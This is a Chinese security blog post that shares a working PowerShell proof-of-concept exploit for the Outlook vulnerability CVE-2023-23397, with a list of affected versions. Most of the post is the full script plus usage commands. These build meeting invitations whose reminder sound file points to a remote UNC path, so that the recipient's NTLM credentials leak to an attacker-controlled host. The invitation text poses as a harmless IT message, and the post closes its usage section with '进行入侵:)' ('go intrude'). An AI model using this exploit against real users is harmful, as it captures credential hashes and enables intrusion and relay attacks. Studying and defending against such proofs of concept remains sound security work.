【CVE-2023-23397】Microsoft Outlook 安全漏洞

作者：Sec-Labs | 发布时间：2023-03-18 20:51:49

项目地址

https://github.com/api0cradle/CVE-2023-23397-POC-Powershell

漏洞介绍

Microsoft Outlook是美国微软（Microsoft）公司的一套电子邮件应用程序。

Microsoft Outlook存在安全漏洞。以下产品和版本受到影响：Microsoft Office LTSC 2021 for 32-bit editions,Microsoft Outlook 2016 (32-bit edition),Microsoft Office LTSC 2021 for 64-bit editions,Microsoft 365 Apps for Enterprise for 64-bit Systems,Microsoft Office 2019 for 64-bit editions,Microsoft 365 Apps for Enterprise for 32-bit Systems,Microsoft Office 2019 for 32-bit editions,Microsoft Outlook 2013 Service Pack 1 (64-bit editions),Microsoft Outlook 2013 RT Service Pack 1,Microsoft Outlook 2013 Service Pack 1 (32-bit editions),Microsoft Outlook 2016 (64-bit edition)。

POC介绍

这段代码的功能是使用 ReminderSoundFile 选项发送或保存日历 NTLM 泄漏。运行脚本以在 Powershell 中加载函数，然后您可以使用下面的示例作为使用函数的起点。需要在安装了 Outlook 的 Windows 计算机上运行，因为它使用 Outlook COM 对象发送电子邮件。请注意，它将从与 Outlook 关联的电子邮件帐户发送电子邮件。当前的函数将添加会议开始时间，以便在脚本执行时设置为持续 2 小时。

发送

Send-CalendarNTLMLeak -recipient "user.name@exampledomain.com" -remotefilepath "\\10.10.10.10\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
Send-CalendarNTLMLeak -recipient "user.name@exampledomain.com" -remotefilepath "\\files.domain.com\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
Send-CalendarNTLMLeak -recipient "user.name@exampledomain.com" -remotefilepath "\\files.domain.com@80\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
Send-CalendarNTLMLeak -recipient "user.name@exampledomain.com" -remotefilepath "\\files.domain.com@SSL@443\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"

保存

Save-CalendarNTLMLeak -remotefilepath "\\10.10.10.10\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
Save-CalendarNTLMLeak -remotefilepath "\\files.domain.com\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
Save-CalendarNTLMLeak -remotefilepath "\\files.domain.com@80\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
Save-CalendarNTLMLeak -remotefilepath "\\files.domain.com@SSL@443\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"

进行入侵:)

POC

CVE-2023-23397.ps1

# CVE-2023-23397 POC
# Author: Oddvar Moe (@oddvarmoe) - TrustedSec
# Usage examples: 
# 
# Sending:
# Send-CalendarNTLMLeak -recipient "user.name@exampledomain.com" -remotefilepath "\\10.10.10.10\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
# Send-CalendarNTLMLeak -recipient "user.name@exampledomain.com" -remotefilepath "\\files.domain.com\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
# Send-CalendarNTLMLeak -recipient "user.name@exampledomain.com" -remotefilepath "\\files.domain.com@80\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
# Send-CalendarNTLMLeak -recipient "user.name@exampledomain.com" -remotefilepath "\\files.domain.com@SSL@443\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
#
# Saving:
# Save-CalendarNTLMLeak -remotefilepath "\\10.10.10.10\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
# Save-CalendarNTLMLeak -remotefilepath "\\files.domain.com\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
# Save-CalendarNTLMLeak -remotefilepath "\\files.domain.com@80\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
# Save-CalendarNTLMLeak -remotefilepath "\\files.domain.com@SSL@443\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"


function Send-CalendarNTLMLeak ($recipient, $remotefilepath, $meetingsubject, $meetingbody)
{
    $Outlook = New-Object -comObject Outlook.Application
    $newcal = $outlook.CreateItem('olAppointmentItem')
    $newcal.ReminderSoundFile = $remotefilepath
    $newcal.Recipients.add($recipient)
    $newcal.MeetingStatus = [Microsoft.Office.Interop.Outlook.OlMeetingStatus]::olMeeting
    $newcal.Subject = $meetingsubject
    $newcal.Location = "Virtual"
    $newcal.Body = $meetingbody
    $newcal.Start = get-date
    $newcal.End = (get-date).AddHours(2)
    $newcal.ReminderOverrideDefault = 1
    $newcal.ReminderSet = 1
    $newcal.ReminderPlaysound = 1
    $newcal.send()
}

function Save-CalendarNTLMLeak ($remotefilepath, $meetingsubject, $meetingbody)
{
    $Outlook = New-Object -comObject Outlook.Application
    $newcal = $outlook.CreateItem('olAppointmentItem')
    $newcal.ReminderSoundFile = $remotefilepath
    $newcal.MeetingStatus = [Microsoft.Office.Interop.Outlook.OlMeetingStatus]::olMeeting
    $newcal.Subject = $meetingsubject
    $newcal.Location = "Virtual"
    $newcal.Body = $meetingbody
    $newcal.Start = get-date
    $newcal.End = (get-date).AddHours(2)
    $newcal.ReminderOverrideDefault = 1
    $newcal.ReminderSet = 1
    $newcal.ReminderPlaysound = 1
    $newcal.save()
}

标签：工具分享, 漏洞分享, POC脚本